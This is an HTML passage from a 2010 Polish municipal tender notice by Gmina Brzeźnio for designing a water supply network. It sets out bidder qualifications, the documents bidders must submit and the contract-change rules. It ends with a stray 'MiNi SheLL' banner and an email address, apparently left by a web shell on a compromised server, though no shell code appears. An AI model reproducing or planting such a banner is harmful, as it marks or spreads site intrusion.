</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wskazać do wykonania niniejszego zamówienia posiadanie osób wraz 
z informacją na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności oraz informację o podstawie do dysponowania tymi osobami:
- projektant w specjalności sanitarnej z uprawnieniami do projektowania w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych, posiadający doświadczenie 
w opracowaniu jednego projektu budowy, rozbudowy lub przebudowy sieci wodociągowych o długości nie krótszej niż 10 km.
W/w zobowiązany jest posiadać min. 3 letnie doświadczenie z zakresu projektowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać na rachunku bankowym środki finansowe lub mieć zdolność kredytową  w wysokości nie mniejszej niż 95 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta powinna składać się z:
a)	formularza ofertowego - sporządzonego zgodnie z załącznikiem nr 1 do niniejszej SIWZ;
Podstawą obliczenia wartości zamówienia są dane zawarte w opisie przedmiotu zamówienia.

b)	oryginału pełnomocnictwa udzielanego osobom podpisującym ofertę lub kserokopii poświadczonej notarialnie za zgodność z oryginałem, o ile prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentu rejestrowego;
c)	w przypadku wspólnego ubiegania się o udzielenie zamówienia - pełnomocnictwo do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;
d)	wykaz części zamówienia, które Wykonawca zamierza powierzyć podwykonawcom lub oświadczenie, że Wykonawca wykona zamówienie własnymi siłami - załącznik nr 7 do SIWZ;
e)	zestawu oświadczeń i dokumentów, o których mowa w rozdziale VII niniejszej specyfikacji;
f)	projektu umowy - załącznik nr 8 do SIWZ.
Wszystkie powyższe dokumenty winny być przedstawione w formie oryginałów, lub kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień zawartej umowy może nastąpić za zgoda obu stron wyrażoną na piśmie, pod rygorem nieważności.
Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian:

a) konieczność wprowadzenia zmian będzie następstwem zmian stawki VAT, przy czym zmianie ulega kwota podatku VAT i kwota brutto;
b) zmiana systemu walutowego /płatniczego obowiązującego w Polsce
c) konieczność wydłużenia czasu realizacji umowy z przyczyn niezależnych od stron, 
d) zmian przepisów prawa polskiego albo prawa wspólnotowego, w zakresie mającymi wpływ na realizację zamówienia;

e) konieczność wydłużenia czasu realizacji umowy z uwagi na konieczność wykonania projektów zamiennych,
f) zaistnienie konieczności wprowadzenia zmian do umowy, wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,
g) siła wyższa  uniemożliwiająca wykonanie przedmiotu umowy zgodnie z siwz (np. klęski żywiołowe);
h)	Zamawiający przewiduje wydłużenie terminu związania ofertą na okres nie dłuższy niż 60 dni.
i)	Zamawiający przewiduje zmiany nazw, siedziby stron umowy, numerów kont bankowych i innych danych identyfikacyjnych.
j)	Zamawiający przewiduje zmiany osób odpowiedzialnych za kontakty,
k)	Zamawiający przewiduje zmianę osób projektantów pod warunkiem spełnienia przez nowe osoby warunków postawionych w siwz, i załączeniem wniosku o zmianę wraz 
z załączonymi dokumentami poświadczającymi uprawnienia i doświadczenie wskazanych osób. 

Warunki formalne:
Zamawiający zastrzega jednocześnie, że zmiany postanowień umowy mogą być przeprowadzone zaistnienia co najmniej jednego z w/w warunków, jedynie po przeprowadzeniu negocjacji przez strony, prowadzących do wypracowania obustronnego konsensusu obejmującego wprowadzone do umowy zmiany.
Negocjacje będą mogły być prowadzone na wniosek każdej ze stron, zgłaszany w razie zaistnienia co najmniej jednego z w/w warunków.
W przypadku gdy strony w drodze negocjacji dojdą do porozumienia odnośnie zakresu 
i treści wprowadzanych zmian, podpisany zostanie przez strony aneks do umowy o realizację niniejszego zamówienia publicznego.

Zamawiający przewiduje rozwiązania zamienne, które nie wykraczają poza zdefiniowany przedmiot zamówienia;

Uwzględnienie rozwiązań zamiennych w trakcie realizowanej inwestycji może nastąpić przez zmianę umowy o zamówienie publiczne (aneks do umowy). 
Wprowadzenie rozwiązań zamiennych nie może spowodować zwiększenia wysokości wynagrodzenia określonego w umowie.
Rozwiązania zamienne mogą zostać wykonane wyłącznie na podstawie uprzednio sporządzonego protokołu konieczności.

Dokonanie zmian, o których mowa powyżej wymaga podpisania aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.brzeznio.finn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Brzeźniu
ul. Wspólna 44
98-275 Brzeźnio.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.07.2010 godzina 10:00, miejsce: Urząd Gminy w Brzeźniu
ul. Wspólna 44
98-275 Brzeźnio
sekretariat pok. nr 17.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com